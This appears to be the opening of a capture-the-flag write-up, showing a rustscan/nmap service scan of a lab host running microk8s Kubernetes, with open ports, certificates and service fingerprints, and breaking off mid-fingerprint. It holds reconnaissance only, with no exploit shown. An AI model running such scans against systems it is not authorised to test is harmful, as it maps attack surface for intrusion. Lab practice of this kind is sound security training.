姊妹篇啊

rustscan --ulimit 5000 -a 10.10.182.202 -- -sV -sC

rustscan --ulimit 5000 -a 10.10.182.202 -- -sV -sC
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.182.202:22
Open 10.10.182.202:10257
Open 10.10.182.202:10250
Open 10.10.182.202:16443
Open 10.10.182.202:10259
Open 10.10.182.202:10255
Open 10.10.182.202:25000
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC" on ip 10.10.182.202
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-08 16:33 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:33
Completed NSE at 16:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:33
Completed NSE at 16:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:33
Completed NSE at 16:33, 0.00s elapsed
Initiating Ping Scan at 16:33
Scanning 10.10.182.202 [4 ports]
Completed Ping Scan at 16:33, 0.35s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:33
Completed Parallel DNS resolution of 1 host. at 16:33, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:33
Scanning 10.10.182.202 [7 ports]
Discovered open port 10250/tcp on 10.10.182.202
Discovered open port 10259/tcp on 10.10.182.202
Discovered open port 10257/tcp on 10.10.182.202
Discovered open port 22/tcp on 10.10.182.202
Discovered open port 10255/tcp on 10.10.182.202
Discovered open port 16443/tcp on 10.10.182.202
Discovered open port 25000/tcp on 10.10.182.202
Completed SYN Stealth Scan at 16:33, 0.35s elapsed (7 total ports)
Initiating Service scan at 16:33
Scanning 7 services on 10.10.182.202
Service scan Timing: About 71.43% done; ETC: 16:36 (0:00:55 remaining)
Completed Service scan at 16:35, 138.40s elapsed (7 services on 1 host)
NSE: Script scanning 10.10.182.202.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:35
Completed NSE at 16:35, 18.04s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:35
Completed NSE at 16:35, 3.35s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Nmap scan report for 10.10.182.202
Host is up, received reset ttl 60 (0.32s latency).
Scanned at 2024-03-08 16:33:12 CST for 161s

PORT      STATE SERVICE     REASON         VERSION
22/tcp    open  ssh         syn-ack ttl 60 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 99:bf:3f:0e:b2:95:0e:76:e5:0f:28:8a:e9:25:bd:b1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChoOOe3I9Ht5v0FymFzVpEq4xeHBDdq8Py0Yd4oNCbIcS28e6CLx8bCzhhHHqw2I2/+vhdlIj1AcwW/vASRHQqEdDNNY57GrM+Oa+O0gdv66jRw9ZREwD7VjQt8Ql1DLqWhZGHsTH06qdta2BsEzsd5ggc9iwVkt4VARKyyNrH4RoGFyDXunGXQmg1uYajiXDVEGnkMdyjoCeayd5dWbCc1KcbG5ZF/is62Nh+xFV5eKR7Z4HuvyrCe15gP+NnFEOf/tcU93v3o0NVW1ZjOTKGtue/dSz95iq0A6bEhcRjxgYZJNAgL9gCRoy9Qod1+c6p9NIW5ukmYj/hnqeyooexBFtQAxhzhYhwVElz6jjExUktlXHkFHRyXkIjIxPeK1WvXVr2uj/+LrVcwkq9JngOfDJ+Cwve/ZXmLOlVswr1wUR+Jn/noysrKKP0bYTiMo1Au1yO0NWlJ4H90JEjHQ6brpv56UgwE5n6om/yZ9lLh4Nog/Yj2KdcgfwTiaVx4A0=
|   256 df:48:b7:b2:a2:bc:5a:7e:f9:bb:b8:54:2a:98:03:09 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK3p0AWN289eLta3lUlj3UWvtGcdIN1QMeIFOKLinw7cy34fxhjXqA7barPIejPCCpWvkkojT7QKKtooGPb3TKw=
|   256 ad:09:e8:fd:58:3b:a1:3e:37:7e:62:d2:44:20:7a:f2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGbF1S8zZY4qkuEnnU4p5SrEsstZ99cRBwkBYqJPjlKw
10250/tcp open  ssl/http    syn-ack ttl 60 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| ssl-cert: Subject: commonName=microk8s@1647797913
| Subject Alternative Name: DNS:microk8s
| Issuer: commonName=microk8s-ca@1647797912
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-03-20T16:38:32
| Not valid after:  2023-03-20T16:38:32
| MD5:   4fd0:e33e:0fe5:18cb:3b59:b32f:26bb:4296
| SHA-1: d560:5617:ba2b:2fd6:5e75:8de8:aa04:d912:3d30:496e
| -----BEGIN CERTIFICATE-----
| MIIDJTCCAg2gAwIBAgIBAjANBgkqhkiG9w0BAQsFADAhMR8wHQYDVQQDDBZtaWNy
| b2s4cy1jYUAxNjQ3Nzk3OTEyMB4XDTIyMDMyMDE2MzgzMloXDTIzMDMyMDE2Mzgz
| MlowHjEcMBoGA1UEAwwTbWljcm9rOHNAMTY0Nzc5NzkxMzCCASIwDQYJKoZIhvcN
| AQEBBQADggEPADCCAQoCggEBAKutSnT1zV6PhNeD0uMhXGr7auoLYJt3Mz0zFMB8
| KkY3AFNJAso1HbSJXuXu8hnq2AAfWAVMs5yJrNvOmcYMRVmm6taos76SWxCgUw7P
| eXn55bquvhql8r4+R7VIWFNilwiw5I67Hvsr6miil3bZVYSO1c5kcA/2OHp2GJfe
| 2anUvnmV5Qzz8ghwpovGjZ/tRDWW0Mjbp/T5kUv1GOcj30t14GeLZ5eMSlFPQUR2
| seuUxnquhl9FeynuymnFo7gUTqgHm/PXh2IDFpUwLP5NS1MHVtvtEFJAMxAuLPME
| AqdyRdmYw2SkVn94JopyIO9+BKcQKt/d6e/ejMYyesTvlLECAwEAAaNrMGkwDgYD
| VR0PAQH/BAQDAgWgMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB/wQCMAAw
| HwYDVR0jBBgwFoAU7O7jxwBLPl/jQ+BibTGVukNTQEQwEwYDVR0RBAwwCoIIbWlj
| cm9rOHMwDQYJKoZIhvcNAQELBQADggEBAEYfbU8pEOyQV/XSaTvzPC2OVRaXp+Lv
| IzgNP+njHHhqKk2NqOyhbLCVP2NYfL2W+LM/ibP4oLlIUMGO2z+apAAEXeX8EFQx
| sxIF2xBff7PobzRJAftQCdbctpUZqfvxfxmOcTYlbkqvBf4x2qfcdcfoMtsk5GyY
| rLC1aq+RmmZ0My2avvcMNcqMEnxV3o9OxRPj1hOM9y1WYFiRWfhStvhyq6xqp6kC
| dGNbTL6UKZcDluadHHkvrkhkTeorA+OSWxwHWZw5qDEnNcpDYWJy54w+PjlmAdLk
| 2kNQJBn5tGuspvV6uRCig+5dodDCaCy006fb/7n8qX5vpBl6mU7sJLY=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| tls-alpn: 
|   h2
|_  http/1.1
10255/tcp open  http        syn-ack ttl 60 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
10257/tcp open  ssl/unknown syn-ack ttl 60
| ssl-cert: Subject: commonName=localhost@1709886761
| Subject Alternative Name: DNS:localhost, DNS:localhost, IP Address:127.0.0.1
| Issuer: commonName=localhost-ca@1709886753
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-08T07:32:28
| Not valid after:  2025-03-08T07:32:28
| MD5:   9c35:07f2:649e:342d:67f4:7272:9f0c:ee34
| SHA-1: 00e2:d175:2109:f245:67bc:893b:5d83:6c01:61e0:4ffc
| -----BEGIN CERTIFICATE-----
| MIIDOTCCAiGgAwIBAgIBAjANBgkqhkiG9w0BAQsFADAiMSAwHgYDVQQDDBdsb2Nh
| bGhvc3QtY2FAMTcwOTg4Njc1MzAeFw0yNDAzMDgwNzMyMjhaFw0yNTAzMDgwNzMy
| MjhaMB8xHTAbBgNVBAMMFGxvY2FsaG9zdEAxNzA5ODg2NzYxMIIBIjANBgkqhkiG
| 9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0N2o1678lxS5AB2Ir5MqF4emzLu9jxPVWasT
| Dt049m/vjkBWbRpbOeiqxD/1kIFqzJifHXWp9GKRQD7hsedG4MHbO6X+upfHzELt
| IVggx4g66Kk+wb+cFmCC0aMURdBj86itR90800yfjQq/X9DZpNYObzUGNthXS5BA
| 3XvE0QduOmiNfgo0+bjdJpJgNrrtOLipYsMZyIrinZ00+Zns8hfiYs0lcJSmJefr
| 8kkIUKLt2sR/sdOOg7eFQ+qgwRqWxMvfOqRzOccPkWbt7su43gwssG0xZsU5DyJ6
| A8EaLbA+eGeAryPJQS+xpf2yyIm9wcubU9+ybzH1jPTFeVmtDQIDAQABo30wezAO
| BgNVHQ8BAf8EBAMCBaAwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/BAIw
| ADAfBgNVHSMEGDAWgBQ58ad1LhpNJkHevOeKPo0494K7eDAlBgNVHREEHjAcggls
| b2NhbGhvc3SCCWxvY2FsaG9zdIcEfwAAATANBgkqhkiG9w0BAQsFAAOCAQEAkTJu
| qmccg9nJzT7YHSpfHHW1XrkNpjjsPYjRAlkoxkjNfQ5DTKvmPKSuvXm8CxtEAA+q
| XTQnNihQ8QCGPDEVeiNF8e1IYRoCQzZTetfWtYSQEUKGs/Q+28CRFk1Uq6aXMhJ3
| Lfu8pR9AHTv8taeMIxL7im2K4FRyTRppIejuTMVh8vwy3ieuINS2qkN0shRzGN+Z
| lsj61A7A6NtcZUrzsQjjS1Td44wtfHvfy8OI387kf3M9G50EU4mw2F+m0JXUrnEP
| odv9FYhjKL+XG8LMR+cDuMVRTw3/e10BrpzkZqe+kVd/nsnk+DpoaS/v0j1UHJBT
| 3rTDEiXXBGjESBGwZg==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 403 Forbidden
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     Date: Fri, 08 Mar 2024 08:33:35 GMT
|     Content-Length: 185
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
|   HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     Date: Fri, 08 Mar 2024 08:33:37 GMT
|     Content-Length: 189
|_    {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
| tls-alpn: 
|   h2
|_  http/1.1
10259/tcp open  ssl/unknown syn-ack ttl 60
| ssl-cert: Subject: commonName=localhost@1709886752
| Subject Alternative Name: DNS:localhost, DNS:localhost, IP Address:127.0.0.1
| Issuer: commonName=localhost-ca@1709886748
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-08T07:32:28
| Not valid after:  2025-03-08T07:32:28
| MD5:   26ba:efbf:360b:695d:e241:5576:0b9f:5918
| SHA-1: 4dd2:88e0:6688:4f8b:28d9:ae9d:bc96:c5dc:22ab:33de
| -----BEGIN CERTIFICATE-----
| MIIDOTCCAiGgAwIBAgIBAjANBgkqhkiG9w0BAQsFADAiMSAwHgYDVQQDDBdsb2Nh
| bGhvc3QtY2FAMTcwOTg4Njc0ODAeFw0yNDAzMDgwNzMyMjhaFw0yNTAzMDgwNzMy
| MjhaMB8xHTAbBgNVBAMMFGxvY2FsaG9zdEAxNzA5ODg2NzUyMIIBIjANBgkqhkiG
| 9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyhmB/Dg+73eYHUD6sd16W4angwoP3SDWx9uc
| Zh8j7g59B0u1wFYncncTQKqMQ6QS0Af1BBxLvZdPRzgLUhFMqHhrXlMdFqTH+5Bu
| chYYEHQVktpfiYqisZoIQF1rmfw3mvKfPS47SF574hlzpkiElkxQrKkscsPUgTaU
| bJamlXJCOrL31l+eeu6ijq1TV7sUYfqtkZrpMKGJhY8i2SJlaIpyhpAiDcp1QScg
| MXZowHxJVIkU77UOO6m4Ss4MvpqTNmAdweRXfl+GtGHkzLwd3v9zcHP13QKgzpdb
| C/C1F06XOHtqKh5wRC0ACYvBsTYx3EzRfX7Cwabnx81QYcPeYQIDAQABo30wezAO
| BgNVHQ8BAf8EBAMCBaAwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/BAIw
| ADAfBgNVHSMEGDAWgBQaCQsq0SSM1mRynyTJPfbF9MTzozAlBgNVHREEHjAcggls
| b2NhbGhvc3SCCWxvY2FsaG9zdIcEfwAAATANBgkqhkiG9w0BAQsFAAOCAQEAP1yl
| POjv6xQ8RXb0AwrYS9pvvd5r5MycWgOOjGo68QGx10GBMPEY/n/8LezY3r8jerI4
| aA8j0lzWBF1dBDdOQWZJMWOP3h112+GyM8/deDyAV0ICITLYvubEWmFt9FIzyp5B
| nPMVw6y1tVW6huEI9NDMoTqf7o8+B4I+TTFX/HdoTOlwQnw/Jdx0zM9ESv53EDSv
| x/o6pbQIB/WTJQaxxU6vi5PcJsb1OaQ3SCEGeQsnWN0DGMstbiyZkAeFy7FnPgse
| IFw12XR7NWTzpdkeGz14u2Oir97TFYCkiPiHVzpsB9BfTkQjOB1iAgRoFgCZB8/+
| yC7osJCKROZrs5225A==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 403 Forbidden
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     Date: Fri, 08 Mar 2024 08:33:36 GMT
|     Content-Length: 185
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot get path "/"","reason":"Forbidden","details":{},"code":403}
|   HTTPOptions: 
|     HTTP/1.0 403 Forbidden
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     X-Content-Type-Options: nosniff
|     Date: Fri, 08 Mar 2024 08:33:38 GMT
|     Content-Length: 189
|_    {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User "system:anonymous" cannot options path "/"","reason":"Forbidden","details":{},"code":403}
| tls-alpn: 
|   h2
|_  http/1.1
16443/tcp open  ssl/unknown syn-ack ttl 60
| ssl-cert: Subject: commonName=127.0.0.1/organizationName=Canonical/stateOrProvinceName=Canonical/countryName=GB/localityName=Canonical/organizationalUnitName=Canonical
| Subject Alternative Name: DNS:kubernetes, DNS:kubernetes.default, DNS:kubernetes.default.svc, DNS:kubernetes.default.svc.cluster, DNS:kubernetes.default.svc.cluster.local, IP Address:127.0.0.1, IP Address:10.152.183.1, IP Address:10.10.182.202
| Issuer: commonName=10.152.183.1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-08T08:31:39
| Not valid after:  2025-03-08T08:31:39
| MD5:   66ef:7f20:0261:33d8:62b6:0898:ce34:714b
| SHA-1: 674b:389a:4bc5:1b0d:99f2:8788:d882:adef:25a5:960e
| -----BEGIN CERTIFICATE-----
| MIIERTCCAy2gAwIBAgIUJHo62dCzpXCUazy6UyPZDOdgKmowDQYJKoZIhvcNAQEL
| BQAwFzEVMBMGA1UEAwwMMTAuMTUyLjE4My4xMB4XDTI0MDMwODA4MzEzOVoXDTI1
| MDMwODA4MzEzOVowcTELMAkGA1UEBhMCR0IxEjAQBgNVBAgMCUNhbm9uaWNhbDES
| MBAGA1UEBwwJQ2Fub25pY2FsMRIwEAYDVQQKDAlDYW5vbmljYWwxEjAQBgNVBAsM
| CUNhbm9uaWNhbDESMBAGA1UEAwwJMTI3LjAuMC4xMIIBIjANBgkqhkiG9w0BAQEF
| AAOCAQ8AMIIBCgKCAQEApjpbG0i/g81UOCNSzxWEK3rIfnBhulzfikf/0xYMh50G
| vF7uOm8Vi4Tjy/gc7ftFBdOolwFlpFegfztRIwrLViTqfoUg5zLqXh6DROt3cbUo
| zOaeZUAXPzdocnrVo54WpWAJK23eePRAggFygEVdZdF6vz+miNTfhOgdNTODT4V8
| Cf+hbgbpB9rRjdz4jkrAG/oXM3MoheYp2oRQzoIf6pfz4XtaEt7PBPNBKtWs7xCX
| sXr38VBIQEjv3I4vhR38DGgMUIy8FFuJSlo451No9Y/yNgbtKpcdnsvq8O9gzpbA
| sNip0Y1f6HErRhtKDCosGPv2I8bH+zy9uxR3ZeHvgQIDAQABo4IBLTCCASkwUgYD
| VR0jBEswSYAUW9bvPh199LmBXIPFZtfFcp8pmsmhG6QZMBcxFTATBgNVBAMMDDEw
| LjE1Mi4xODMuMYIUSyIc0S1Mg3lPqiK4keqNfebw/3gwCQYDVR0TBAIwADALBgNV
| HQ8EBAMCBLAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMIGbBgNVHREE
| gZMwgZCCCmt1YmVybmV0ZXOCEmt1YmVybmV0ZXMuZGVmYXVsdIIWa3ViZXJuZXRl
| cy5kZWZhdWx0LnN2Y4Iea3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVygiRr
| dWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWyHBH8AAAGHBAqYtwGH
| BAoKtsowDQYJKoZIhvcNAQELBQADggEBAC7+y5UGMh3qkFLhTKpeJwPla9tUu3Qt
| qNuZzD3TNVEUSaG5wKyEPAvo/Q7YAhYfn4kthX0Ar/85SahfAnV6gc8e4C3nU2uN
| mGi3rjtHR2R/zKaRDQbQyal5NnuFjc+i1DiyI7RL6Sbu9RpxyJos8cScaQojYrVB
| PEOoyMPuFr1yQsj0ZOvHNbSes4Pefx1qag5wJQOMB8SSduAe8SaJAkko2qjejNde
| uqssND2SH03hJe5jXy/Bd3m59NDdhK5egvPZgukIKJJ6xcP5bGH7U5DXKYRNLMNM
| cF3/FhJc5uP1sAgqI1ZXFOtQPTNwewdScRpewHErkWZz4SY6U32AMhw=
|_-----END CERTIFICATE-----
| tls-alpn: 
|   h2
|_  http/1.1
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 401 Unauthorized
|     Audit-Id: 1707969f-c859-441e-8002-5b41ce0aa55d
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     Date: Fri, 08 Mar 2024 08:34:19 GMT
|     Content-Length: 129
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
|   GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 401 Unauthorized
|     Audit-Id: 909e8f4e-2741-42e1-96e2-4f0cfa303a35
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     Date: Fri, 08 Mar 2024 08:33:35 GMT
|     Content-Length: 129
|     {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
|   HTTPOptions: 
|     HTTP/1.0 401 Unauthorized
|     Audit-Id: 0b811fb7-663d-4fb7-b0e3-a1d21fb1914d
|     Cache-Control: no-cache, private
|     Content-Type: application/json
|     Date: Fri, 08 Mar 2024 08:33:37 GMT
|     Content-Length: 129
|_    {"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"Unauthorized","reason":"Unauthorized","code":401}
|_ssl-date: TLS randomness does not represent time
25000/tcp open  ssl/http    syn-ack ttl 60 Gunicorn 19.7.1
| http-methods: 
|_  Supported Methods: OPTIONS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=127.0.0.1/organizationName=Canonical/stateOrProvinceName=Canonical/countryName=GB/localityName=Canonical/organizationalUnitName=Canonical
| Subject Alternative Name: DNS:kubernetes, DNS:kubernetes.default, DNS:kubernetes.default.svc, DNS:kubernetes.default.svc.cluster, DNS:kubernetes.default.svc.cluster.local, IP Address:127.0.0.1, IP Address:10.152.183.1, IP Address:10.10.182.202
| Issuer: commonName=10.152.183.1
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-08T08:31:39
| Not valid after:  2025-03-08T08:31:39
| MD5:   66ef:7f20:0261:33d8:62b6:0898:ce34:714b
| SHA-1: 674b:389a:4bc5:1b0d:99f2:8788:d882:adef:25a5:960e
| -----BEGIN CERTIFICATE-----
| MIIERTCCAy2gAwIBAgIUJHo62dCzpXCUazy6UyPZDOdgKmowDQYJKoZIhvcNAQEL
| BQAwFzEVMBMGA1UEAwwMMTAuMTUyLjE4My4xMB4XDTI0MDMwODA4MzEzOVoXDTI1
| MDMwODA4MzEzOVowcTELMAkGA1UEBhMCR0IxEjAQBgNVBAgMCUNhbm9uaWNhbDES
| MBAGA1UEBwwJQ2Fub25pY2FsMRIwEAYDVQQKDAlDYW5vbmljYWwxEjAQBgNVBAsM
| CUNhbm9uaWNhbDESMBAGA1UEAwwJMTI3LjAuMC4xMIIBIjANBgkqhkiG9w0BAQEF
| AAOCAQ8AMIIBCgKCAQEApjpbG0i/g81UOCNSzxWEK3rIfnBhulzfikf/0xYMh50G
| vF7uOm8Vi4Tjy/gc7ftFBdOolwFlpFegfztRIwrLViTqfoUg5zLqXh6DROt3cbUo
| zOaeZUAXPzdocnrVo54WpWAJK23eePRAggFygEVdZdF6vz+miNTfhOgdNTODT4V8
| Cf+hbgbpB9rRjdz4jkrAG/oXM3MoheYp2oRQzoIf6pfz4XtaEt7PBPNBKtWs7xCX
| sXr38VBIQEjv3I4vhR38DGgMUIy8FFuJSlo451No9Y/yNgbtKpcdnsvq8O9gzpbA
| sNip0Y1f6HErRhtKDCosGPv2I8bH+zy9uxR3ZeHvgQIDAQABo4IBLTCCASkwUgYD
| VR0jBEswSYAUW9bvPh199LmBXIPFZtfFcp8pmsmhG6QZMBcxFTATBgNVBAMMDDEw
| LjE1Mi4xODMuMYIUSyIc0S1Mg3lPqiK4keqNfebw/3gwCQYDVR0TBAIwADALBgNV
| HQ8EBAMCBLAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMIGbBgNVHREE
| gZMwgZCCCmt1YmVybmV0ZXOCEmt1YmVybmV0ZXMuZGVmYXVsdIIWa3ViZXJuZXRl
| cy5kZWZhdWx0LnN2Y4Iea3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVygiRr
| dWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWyHBH8AAAGHBAqYtwGH
| BAoKtsowDQYJKoZIhvcNAQELBQADggEBAC7+y5UGMh3qkFLhTKpeJwPla9tUu3Qt
| qNuZzD3TNVEUSaG5wKyEPAvo/Q7YAhYfn4kthX0Ar/85SahfAnV6gc8e4C3nU2uN
| mGi3rjtHR2R/zKaRDQbQyal5NnuFjc+i1DiyI7RL6Sbu9RpxyJos8cScaQojYrVB
| PEOoyMPuFr1yQsj0ZOvHNbSes4Pefx1qag5wJQOMB8SSduAe8SaJAkko2qjejNde
| uqssND2SH03hJe5jXy/Bd3m59NDdhK5egvPZgukIKJJ6xcP5bGH7U5DXKYRNLMNM
| cF3/FhJc5uP1sAgqI1ZXFOtQPTNwewdScRpewHErkWZz4SY6U32AMhw=
|_-----END CERTIFICATE-----
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port10257-TCP:V=7.94SVN%T=SSL%I=7%D=3/8%Time=65EACD5E%P=aarch64-unknown
SF:-linux-gnu%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon
SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\
SF:r\n400\x20Bad\x20Request")%r(GetRequest,170,"HTTP/1\.0\x20403\x20Forbid
SF:den\r\nCache-Control:\x20no-cache,\x20private\r\nContent-Type:\x20appli
SF:cation/json\r\nX-Content-Type-Options:\x20nosniff\r\nDate:\x20Fri,\x200
SF:8\x20Mar\x202024\x2008:33:35\x20GMT\r\nContent-Length:\x20185\r\n\r\n{\
SF:"kind\":\"Status\",\"apiVersion\":\"v1\",\"metadata\":{},\"status\":\"F
SF:ailure\",\"message\":\"forbidden:\x20User\x20\\\"system:anonymous\\\"\x
SF:20cannot\x20get\x20path\x20\\\"/\\\"\",\"reason\":\"Forbidden\",\"detai
SF:ls\":{},\"code\":403}\n")%r(HTTPOptions,174,"HTTP/1\.0\x20403\x20Forbid
SF:den\r\nCache-Control:\x20no-cache,\x20private\r\nContent-Type:\x20appli
SF:cation/json\r\nX-Content-Type-Options:\x20nosniff\r\nDate:\x20Fri,\x200
SF:8\x20Mar\x202024\x2008:33:37\x20GMT\r\nContent-Length:\x20189\r\n\r\n{\
SF:"kind\":\"Status\",\"apiVersion\":\"v1\",\"metadata\":{},\"status\":\"F
SF:ailure\",\"message\":\"forbidden:\x20User\x20\\\"system:anonymous\\\"\x
SF:20cannot\x20options\x20path\x20\\\"/\\\"\",\"reason\":\"Forbidden\",\"d
SF:etails\":{},\"code\":403}\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad
SF:\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnect
SF:ion:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x2040
SF:0\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\
SF:nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67
SF:,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x2
SF:0charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r
SF:(TerminalServerCookie,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent
SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4
SF:00\x20Bad\x20Request")%r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\
SF:x20close\r\n\r\n400\x20Bad\x20Request")%r(Kerberos,67,"HTTP/1\.1\x20400
SF:\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n
SF:Connection:\x20close\r\n\r\n400\x20Bad\x20Request");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port10259-TCP:V=7.94SVN%T=SSL%I=7%D=3/8%Time=65EACD5E%P=aarch64-unknown
SF:-linux-gnu%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon
SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\
SF:r\n400\x20Bad\x20Request")%r(GetRequest,170,"HTTP/1\.0\x20403\x20Forbid
SF:den\r\nCache-Control:\x20no-cache,\x20private\r\nContent-Type:\x20appli
SF:cation/json\r\nX-Content-Type-Options:\x20nosniff\r\nDate:\x20Fri,\x200
SF:8\x20Mar\x202024\x2008:33:36\x20GMT\r\nContent-Length:\x20185\r\n\r\n{\
SF:"kind\":\"Status\",\"apiVersion\":\"v1\",\"metadata\":{},\"status\":\"F
SF:ailure\",\"message\":\"forbidden:\x20User\x20\\\"system:anonymous\\\"\x
SF:20cannot\x20get\x20path\x20\\\"/\\\"\",\"reason\":\"Forbidden\",\"detai
SF:ls\":{},\"code\":403}\n")%r(HTTPOptions,174,"HTTP/1\.0\x20403\x20Forbid
SF:den\r\nCache-Control:\x20no-cache,\x20private\r\nContent-Type:\x20appli
SF:cation/json\r\nX-Content-Type-Options:\x20nosniff\r\nDate:\x20Fri,\x200
